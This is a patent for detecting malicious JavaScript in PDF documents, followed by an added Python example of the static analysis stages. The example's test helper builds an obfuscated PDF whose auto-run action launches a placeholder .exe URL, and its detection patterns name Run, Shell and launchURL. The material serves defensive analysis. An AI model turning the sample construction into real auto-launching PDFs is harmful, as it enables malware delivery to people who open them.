SYSTEM AND METHOD FOR DETECTING MALICIOUS CODE OF PDF DOCUMENT TYPE
First Claim
1. A PDF document type malicious code detection system, comprising:

- an object extraction module configured to find and extract a plurality of object information contained within a collected PDF document;
- a script merge module configured to merge each first JavaScript information from the plurality of extracted object information to generate second JavaScript information;
- an obfuscation release module configured to decrypt/decode the obfuscated/encoded second JavaScript information to generate third JavaScript information when the generated second JavaScript information is obfuscated/encoded;
- a script static module configured to parse the generated third JavaScript information to extract function/pattern information suspected as a malicious code;
- a script dynamic module configured to execute fourth JavaScript information containing the function and pattern information to generate behavior information according to a malicious behavior; and
- a malicious code extraction module configured to extract malicious code information from the behavior information when it is confirmed that a malicious code has been generated.
Abstract
Disclosed herein is a PDF document type malicious code detection system for efficiently detecting a malicious code embedded in a document type and a method thereof. The present invention may perform a dynamic and static analysis on JavaScript within a PDF document, and execute the PDF document to perform a PDF dynamic analysis, thereby achieving an effect of efficiently extracting a malicious code embedded in the PDF document.
10 Claims
1. (Independent claim 1 is reproduced above under First Claim; dependent claims 2, 3 and 4 are not shown.)
5. The PDF document type malicious code detection system of claim wherein the script static module extracts function/pattern information containing at least one of a URL, a PE file (execution file), a JS.HTM file, a code command such as Run or Shell, and a code command such as Copy or Create.
6. A PDF document type malicious code detection method, the method comprising:

(a) parsing a plurality of object information contained within a collected PDF document;
(b) determining whether there is first JavaScript information within the plurality of object information as a result of the analysis;
(c) merging the first JavaScript information when it is determined that there is the first JavaScript information as a result of the determination;
(d) determining whether second JavaScript information generated by the merging is obfuscated/encoded;
(e) decrypting/decoding the second JavaScript information when it is obfuscated/encoded as a result of the determination;
(f) parsing the decrypted/decoded and generated third JavaScript information to perform a script static analysis;
(g) performing a script dynamic analysis on fourth JavaScript generated to contain function/pattern information suspected as a malicious code by the script static analysis; and
(h) extracting malicious code information from behavior information acquired by the script dynamic analysis.

Dependent claims 7, 8, 9 and 10 are not shown.
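The pipeline that claims 1 and 6 describe, steps (a) through (f), as an added Python example: this is not code from the patent or from any product of its assignee, and the function names, the obfuscation heuristics (percent-encoding, String.fromCharCode, eval) and the pattern categories are my own assumptions layered on the wording of claims 5 and 6. The input PDF is constructed inline and is not a real malicious file; its payload is a placeholder URL. Step (g), the script dynamic analysis, is left out because it needs a sandboxed JavaScript engine; the example stops at the static stage and returns the function/pattern hits that the claim feeds into the dynamic stage.

```python
import binascii
import json
import re

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
JS_KEY_RE = re.compile(rb"/JS\s*(?=\(|<(?!<))")  # /JS followed by a literal or <hex> string

def extract_objects(pdf: bytes) -> dict:
    """Step (a): body of every 'N G obj ... endobj' block, keyed by object number."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}

def _read_literal(body: bytes, start: int) -> bytes:
    """Literal string opening at body[start] == b'(' with nested parentheses.
    Backslash escapes are simplified: the escaped byte is copied verbatim."""
    depth, i, out = 0, start, bytearray()
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\":
            out += body[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
        out += c
        i += 1
    raise ValueError("unterminated literal string")

def extract_js(objects: dict) -> list:
    """Step (b): every /JS value (literal or hex string) in object order = first JavaScript."""
    fragments = []
    for num in sorted(objects):
        body = objects[num]
        for m in JS_KEY_RE.finditer(body):
            pos = m.end()
            if body[pos:pos + 1] == b"(":
                raw = _read_literal(body, pos)
            else:
                hexdata = re.sub(rb"\s", b"", body[pos + 1:body.index(b">", pos)])
                raw = binascii.unhexlify(hexdata + b"0" * (len(hexdata) % 2))  # PDF pads an odd nibble
            fragments.append(raw.decode("latin-1"))
    return fragments

# Heuristic markers (assumption): percent-encoding, fromCharCode and eval are treated as obfuscation.
OBF_MARKERS = (re.compile(r"%u?[0-9A-Fa-f]{2}"), re.compile(r"String\.fromCharCode\s*\("),
               re.compile(r"\beval\s*\("))
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
UNESCAPE_RE = re.compile(r"unescape\s*\(\s*(['\"])([^'\"]*)\1\s*\)")
PCT_RE = re.compile(r"%(u[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})")

def is_obfuscated(js: str) -> bool:
    """Step (d): any marker present means the merged script is treated as obfuscated/encoded."""
    return any(p.search(js) for p in OBF_MARKERS)

def deobfuscate(js: str) -> str:
    """Step (e): fold String.fromCharCode(...) and unescape('...') into quoted literals = third JavaScript."""
    js = FROMCHARCODE_RE.sub(lambda m: json.dumps(
        "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())), js)
    return UNESCAPE_RE.sub(lambda m: json.dumps(
        PCT_RE.sub(lambda p: chr(int(p.group(1).lstrip("u"), 16)), m.group(2))), js)

PATTERNS = {  # step (f) categories follow claim 5; 'eval' and launchURL are additions of this example
    "url": re.compile(r"https?://[^\s'\"()<>]+"),
    "pe_file": re.compile(r"[\w.-]+\.(?:exe|dll)\b", re.I),
    "script_file": re.compile(r"[\w.-]+\.(?:js|htm|html)\b", re.I),
    "run_shell": re.compile(r"\b(?:Run|Shell|launchURL)\b"),
    "copy_create": re.compile(r"\b(?:Copy|Create)\w*\b"),
    "eval": re.compile(r"\beval\s*\("),
}

def static_scan(js: str) -> dict:
    """Step (f): suspected function/pattern hits per category, deduplicated and sorted."""
    hits = {n: sorted({m.group(0) for m in p.finditer(js)}) for n, p in PATTERNS.items()}
    return {k: v for k, v in hits.items() if v}

def analyze_pdf(pdf: bytes) -> dict:
    """Steps (a)-(f); step (g), sandboxed execution of the third script, is out of scope here."""
    first = extract_js(extract_objects(pdf))
    second = "\n".join(first)  # step (c): merge in object order
    obfuscated = is_obfuscated(second)
    third = deobfuscate(second) if obfuscated else second
    return {"fragments": len(first), "obfuscated": obfuscated,
            "script": third, "findings": static_scan(third)}

def build_sample_pdf() -> bytes:
    """Constructed input, not a real malicious file: a percent-encoded placeholder URL in one
    action and a fromCharCode-encoded call in a chained /Next action."""
    url_escaped = "".join("%%%02X" % b for b in b"http://example.invalid/a.exe")
    js1 = "var u = unescape('%s');" % url_escaped
    js2 = "eval(String.fromCharCode(%s));" % ",".join(str(b) for b in b"app.launchURL(u)")
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< /S /JavaScript /JS (" + js1.encode() + b") /Next 3 0 R >>\nendobj\n"
            b"3 0 obj\n<< /S /JavaScript /JS <" + js2.encode().hex().encode() + b"> >>\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
```

Running `analyze_pdf(build_sample_pdf())` returns the two fragments merged and decoded to `var u = "http://example.invalid/a.exe";` followed by `eval("app.launchURL(u)");`, with findings in the url, pe_file, run_shell and eval categories. The object parser is deliberately minimal (no cross-reference table, no stream decompression, no object streams), so on real files the extraction step is the part that needs a full PDF parser; the later stages operate on plain text and carry over unchanged.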